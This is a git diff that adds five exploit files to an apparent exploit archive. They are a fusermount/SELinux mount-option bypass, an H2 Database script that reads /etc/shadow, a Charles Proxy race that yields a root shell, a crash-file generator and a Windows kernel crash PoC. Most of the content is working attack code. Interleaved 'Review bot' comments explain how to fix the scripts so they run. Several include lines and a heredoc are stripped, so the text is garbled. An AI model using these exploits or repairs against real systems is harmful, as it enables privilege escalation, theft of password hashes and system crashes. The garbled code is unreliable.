diff --git a/exploits/linux/dos/45106.c b/exploits/linux/dos/45106.c
new file mode 100644
index 000000000..470375f80
--- /dev/null
+++ b/exploits/linux/dos/45106.c
@@ -0,0 +1,100 @@
+/*
+It is possible to bypass fusermount's restrictions on the use of the
+"allow_other" mount option as follows if SELinux is active.
+
+Here's a minimal demo, tested on a Debian system with SELinux enabled in
+permissive mode:
+
+===============================================
+uuser@debian:~$ mount|grep /mount
+user@debian:~$ grep user_allow_other /etc/fuse.conf
+#user_allow_other
+user@debian:~$ _FUSE_COMMFD=10000 fusermount -o allow_other mount/
+fusermount: option allow_other only allowed if 'user_allow_other' is set in /etc/fuse.conf
+user@debian:~$ _FUSE_COMMFD=10000 fusermount -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-\,allow_other' mount
+sending file descriptor: Bad file descriptor
+user@debian:~$ mount|grep /mount
+/dev/fuse on /home/user/mount type fuse (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
+===============================================
+
+Here's a demo that actually mounts a real FUSE filesystem with allow_other,
+again on a Debian system configured to use SELinux:
+===============================================
+user@debian:~$ cat fuse-shim.c
+*/
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+int execv(const char *path, char *const argv_[]) {
+ char **argv = (void*)argv_; /* cast away const */
+ for (char **argvp = argv; *argvp != NULL; argvp++) {
+ char *arg = *argvp;
+ for (char *p = arg; *p; p++) {
+ if (*p == '#') *p = '\\';
+ }
+ }
+ int (*execv_real)(const char *, char *const argv[]) = dlsym(RTLD_NEXT, "execv");
+ execv_real(path, argv_);
+}
+
+/*
+user@debian:~$ gcc -shared -o fuse-shim.so fuse-shim.c -ldl
+user@debian:~$ echo hello world > hello.txt
+user@debian:~$ zip hello.zip hello.txt
+ adding: hello.txt (stored 0%)
+user@debian:~$ LD_PRELOAD=./fuse-shim.so fuse-zip -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-#,allow_other' hello.zip mount
+user@debian:~$ mount|grep /mount
+fuse-zip on /home/user/mount type fuse.fuse-zip (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
+user@debian:~$ sudo bash
+root@debian:/home/user# ls -laZ mount
+total 5
+drwxrwxr-x. 3 root root system_u:object_r:fusefs_t:s0-s0:c0 0 Jul 18 02:19 .
+drwxr-xr-x. 30 user user system_u:object_r:unlabeled_t:s0 4096 Jul 18 02:19 ..
+-rw-r--r--. 1 user user system_u:object_r:fusefs_t:s0-s0:c0 12 Jul 18 02:19 hello.txt
+root@debian:/home/user# cat mount/hello.txt
+hello world
+===============================================
+
+
+I have tested that this also works on Fedora (which, unlike Debian, has SELinux
+enabled by default.)
+
+
+Unfortunately, I only noticed that this was possible after I publicly sent some
+fusermount hardening patches (https://github.com/libfuse/libfuse/pull/268),
+when the maintainer asked a question about one of the patches.
+
+
+Breaking down the attack, the problems are:
+
+1. fusermount's do_mount() is written as if backslashes escape commas in mount
+ options; however, this is only true for the "fsname" and "subtype"
+ pseudo-options filtered out by do_mount(). Neither SELinux nor the FUSE
+ filesystem follow those semantics. This means that an attacker can smuggle
+ a forbidden option through fusermount's checks if the previous option ends
+ with a backslash. However, no option accepted by the FUSE filesystem can end
+ with a backslash, so this seemed unexploitable at first.
+ This is fixed by the following commit in my pull request:
+ https://github.com/libfuse/libfuse/pull/268/commits/455e73588357
+2. fusermount uses a blacklist, not a whitelist; this blacklist does not contain
+ the mount options understood by the SELinux and Smack LSMs. LSMs have the
+ opportunity to grab mount options and make them invisible to the actual
+ filesystem through the security_sb_copy_data() security hook.
+ For this attack, I'm using the "context" option.
+ This is fixed by the following commit in my pull request:
+ https://github.com/libfuse/libfuse/pull/268/commits/d23efabfcee4
+3. The SELinux LSM is slightly lax about parsing the level component of SELinux
+ context strings when the policy uses Multi-Level Security (MLS).
+ When using MLS, the format of a context string is
+ ":::"; the level component is parsed by
+ mls_context_to_sid(). The level component is supposed to specify a
+ sensitivity range (one or two parts delimited with '-'); each part of the
+ range may be followed by ':' and a category set specification.
+ If the sensitivity range consists of two parts and the second part of the
+ range is followed by a category set, the function incorrectly marks a
+ trailing '-' and any following data until ':' or '\0' as consumed, but does
+ not actually parse this data. This allows an attacker to smuggle a backslash
+ through.
+*/
\ No newline at end of file
diff --git a/exploits/linux/webapps/45105.py b/exploits/linux/webapps/45105.py
new file mode 100755
index 000000000..474817444
--- /dev/null
+++ b/exploits/linux/webapps/45105.py
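Review bot: The three `#include` lines in fuse-shim.c and the context-string format placeholder `":::"` have lost their angle-bracketed text, so the shim as committed does not compile and the MLS format description is empty; the same stripping hits the `#include` in 45104.c and the heredoc line `cat > charles_exploit.c <` in 45107.txt, whose hunk header counts 80 lines while only 79 are present, so the include inside that heredoc appears to have been dropped as well. Restoring those lines from the original advisory text is the fix. Separately, `execv` is declared `int` but falls off the end after calling `execv_real(path, argv_);`, which is undefined behaviour on the failure path; `return execv_real(path, argv_);` is the one-line fix. Neither this file nor 45107.txt carries the title/author/date/version header that the other new files in this commit have, so the affected and fixed libfuse versions are only discoverable by reading the prose and the linked pull request.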
@@ -0,0 +1,68 @@
+# Exploit Title: H2 Database 1.4.197 - Information Disclosure
+# Date: 2018-07-16
+# Exploit Author: owodelta
+# Vendor Homepage: www.h2database.com
+# Software Link: http://www.h2database.com/html/download.html
+# Version: all versions
+# Tested on: Linux
+# CVE : CVE-2018-14335
+
+# Description: Insecure handling of permissions in the backup function allows
+# attackers to read sensitive files (outside of their permissions) via a
+# symlink to a fake database file.
+
+# PS, thanks to HTB and our team FallenAngels
+
+#!/usr/bin/python
+
+import requests
+import argparse
+import os
+import random
+
+def cleanup(wdir):
+ cmd = "rm {}symlink.trace.db".format(wdir)
+ os.system(cmd)
+
+def create_symlink(file, wdir):
+ cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
+ os.system(cmd)
+
+
+def trigger_symlink(host, wdir):
+ outputName = str(random.randint(1000,10000))+".zip"
+ #get cookie
+ url = 'http://{}'.format(host)
+ r = requests.get(url)
+ path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
+ url = '{}/{}'.format(url,path)
+ payload = {
+ "tool":"Backup",
+ "args":"-file,"+wdir+outputName+",-dir,"+wdir}
+ #print url
+ requests.post(url,data=payload).text
+ print "File is zipped in: "+wdir+outputName
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ required = parser.add_argument_group('required arguments')
+ required.add_argument("-H",
+ "--host",
+ metavar='127.0.0.1:8082',
+ help="Target host",
+ required=True)
+ required.add_argument("-D",
+ "--dir",
+ metavar="/tmp/",
+ default="/tmp/",
+ help="Writable directory")
+ required.add_argument("-F",
+ "--file",
+ metavar="/etc/shadow",
+ default="/etc/shadow",
+ help="Desired file to read",)
+ args = parser.parse_args()
+
+create_symlink(args.file,args.dir)
+trigger_symlink(args.host,args.dir)
+cleanup(args.dir)
\ No newline at end of file
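Review bot: The `#!/usr/bin/python` line is the 16th line of the file, after the comment header, so it is just another comment and the script cannot be executed directly; it must be the first line, and 45102.py has the same problem with `#!/usr/bin/env python`. The three trailing calls `create_symlink(args.file,args.dir)`, `trigger_symlink(args.host,args.dir)` and `cleanup(args.dir)` are dedented out of the `if __name__ == "__main__":` block, so they run on import and `args` is unbound there; indenting them under the block fixes that. `print "File is zipped in: "+wdir+outputName` is Python 2 syntax, which the shebang should pin explicitly rather than relying on whatever `python` resolves to. `cleanup` removes only the symlink and leaves the backup zip on the host, which the description header should state.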
diff --git a/exploits/macos/local/45107.txt b/exploits/macos/local/45107.txt
new file mode 100644
index 000000000..a48e1318d
--- /dev/null
+++ b/exploits/macos/local/45107.txt
@@ -0,0 +1,80 @@
+Charles Proxy is a great mac application for debugging web services and
+inspecting SSL traffic for any application on your machine.
+
+In order to inspect the SSL traffic it needs to configure the system to use a
+proxy so that it can capture the packets and use its custom root CA to decode
+the SSL.
+
+Setting a system-wide proxy requires root permissions so this is handled by an
+suid binary located within the Charles application folder:
+
+/Applications/Charles.app/Contents/Resources/Charles Proxy Settings
+
+Unfortunately this binary is vulnerable to a race condition which allows a local
+user to spawn a root shell. It supports a parameter "--self-repair" which it
+uses to re-set the root+suid permissions on itself, with a graphical dialog
+shown to the user. However if this is called when the binary is already
+root+suid then no password dialog is shown.
+
+It doesn't validate the path to itself and uses a simple API call to get the
+path to the binary at the time it was invoked. This means that between executing
+the binary and reaching the code path where root+suid is set there is enough
+time to replace the path to the binary with an alternate payload which will then
+receive the suid+root permissions instead of the Charles binary.
+
+This issue was fixed in Charles 4.2.1 released in November 2017.
+
+https://m4.rkw.io/charles_4.2.sh.txt
+2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
+-------------------------------------------------------------------------------
+#!/bin/bash
+
+####################################################
+###### Charles 4.2 local root privesc exploit ######
+###### by m4rkw - https://m4.rkw.io/blog.html ######
+####################################################
+
+cd
+user="`whoami`"
+
+cat > charles_exploit.c <
+int main()
+{
+ setuid(0);
+ seteuid(0);
+ execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
+ return 0;
+}
+EOF
+
+gcc -o charles_exploit charles_exploit.c
+if [ $? -ne 0 ] ; then
+ echo "failed to compile the exploit, you need xcode cli tools for this."
+ exit 1
+fi
+rm -f charles_exploit.c
+
+ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
+./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
+rm -f ./Charles\ Proxy\ Settings
+mv charles_exploit Charles\ Proxy\ Settings
+
+i=0
+
+while :
+do
+ r=`ls -la Charles\ Proxy\ Settings |grep root`
+ if [ "$r" != "" ] ; then
+ break
+ fi
+ sleep 0.1
+ i=$((i+1))
+ if [ $i -eq 10 ] ; then
+ rm -f Charles\ Proxy\ Settings
+ echo "Not vulnerable"
+ exit 1
+ fi
+done
+
+./Charles\ Proxy\ Settings
\ No newline at end of file
diff --git a/exploits/windows/dos/45102.py b/exploits/windows/dos/45102.py
new file mode 100755
index 000000000..6ad5c9d30
--- /dev/null
+++ b/exploits/windows/dos/45102.py
@@ -0,0 +1,26 @@
+# Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2018-07-27
+# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
+# Software Link : http://download.netscantools.com/ipls192.zip
+# Tested Version: 1.92
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python ipPulse_1.92.py
+# 2.- Open ipPulse_1.92.txt and copy content to clipboard
+# 3.- Open ippulse.exe
+# 4.- Target Editor
+# 5.- Paste ClipBoard on "IP Address/HostName"
+# 6.- Paste ClipBoard on "Comment"
+# 7.- Add Above Fields to Target List >>
+# 8.- OK
+# 9.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 3400
+f = open ("ipPulse_1.92.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/45104.c b/exploits/windows/dos/45104.c
new file mode 100644
index 000000000..7c2f831ae
--- /dev/null
+++ b/exploits/windows/dos/45104.c
@@ -0,0 +1,78 @@
+# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
+# Author: vportal
+# Date: 2018-07-27
+# Vendor homepage: http://www.microsoft.com
+# Version: Windows 7 x86
+# Tested on: Windows 7 x86
+# CVE: N/A
+
+# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system
+# call NtUserConsoleControl with the following arguments:
+
+# NtUserControlConsole(1,0,8).
+# NtUserControlConsole(4,0,8).
+# NtUserControlConsole(6,0,12).
+# NtUserControlConsole(2,0,12).
+# NtUserControlConsole(3,0,20).
+# NtUserControlConsole(5,0,8).
+
+# Different crashes are reproduced for each case. For the second case the crash is showed below:
+# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria
+# en 0x%08lx. La memoria no se pudo %s.
+# FAULTING_IP:
+# win32k!xxxSetConsoleCaretInfo+c
+# 93310641 8b0e mov ecx,dword ptr [esi]
+
+# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c)
+# ErrCode = 00000000
+# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
+# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
+# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
+# win32k!xxxSetConsoleCaretInfo+0xc:
+# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=????????
+# Resetting default scope
+
+# CUSTOMER_CRASH_COUNT: 1
+# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
+# BUGCHECK_STR: 0x8E
+# PROCESS_NAME: Win32k-fuzzer_
+
+# CURRENT_IRQL: 0
+# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641
+
+# STACK_TEXT:
+# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
+# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
+# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
+# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
+# WARNING: Frame IP not in any known module. Following frames may be wrong.
+# 0016f204 00000000 00000000 00000000 00000000 0x12e6766
+
+# PoC code:
+
+#include
+
+extern "C"
+
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...)
+{
+__asm{mov eax, ApiNumber};
+__asm{lea edx, ApiNumber + 4};
+__asm{int 0x2e};
+}
+
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+
+int st = 0;
+int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
+
+LoadLibrary(L"user32.dll");
+
+st = (int)SystemCall32(syscall_ID, 4, 0, 8);
+
+return 0;
+}
+
+# The vulnerability has only been tested in Windows 7 x86.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 508b1e1de..08964fb21 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6011,6 +6011,7 @@ id,file,description,date,author,type,platform,port
 44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
 44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
+45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
 44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
 44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
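Review bot: The comment header and trailer use `#`-prefixed lines (`# Exploit Title: ...` through `# PoC code:`, and `# The vulnerability has only been tested in Windows 7 x86.`), which the C preprocessor rejects as invalid directives, so the file cannot be compiled as committed; `//` line comments or one `/* */` block are needed. The PoC is also C++ and MSVC-specific (`extern "C"`, `__asm{}`, `_tmain`, `_TCHAR`) stored under a `.c` name, so a note naming the intended compiler and target would save the next reader a failed build. `SystemCall32` is declared to return `ULONG` but has no return statement after `__asm{int 0x2e};`, which is undefined behaviour even when the value left in eax happens to survive; an explicit return would make the contract clear. The `st` result is assigned and never used, so the cast and the variable could be dropped or the value reported.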
@@ -6030,6 +6031,8 @@ id,file,description,date,author,type,platform,port
 45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
 45095,exploits/windows/dos/45095.py,"NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows,
 45098,exploits/multiple/dos/45098.txt,"Skia - Heap Overflow in SkScan::FillPath due to Precision Error",2018-07-27,"Google Security Research",dos,multiple,
+45102,exploits/windows/dos/45102.py,"ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)",2018-07-30,"Luis Martínez",dos,windows,
+45104,exploits/windows/dos/45104.c,"Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)",2018-07-30,vportal,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9835,6 +9838,7 @@ id,file,description,date,author,type,platform,port
 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
+45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39714,3 +39718,4 @@ id,file,description,date,author,type,platform,port
 45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80
 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux,
 45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php,
+45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,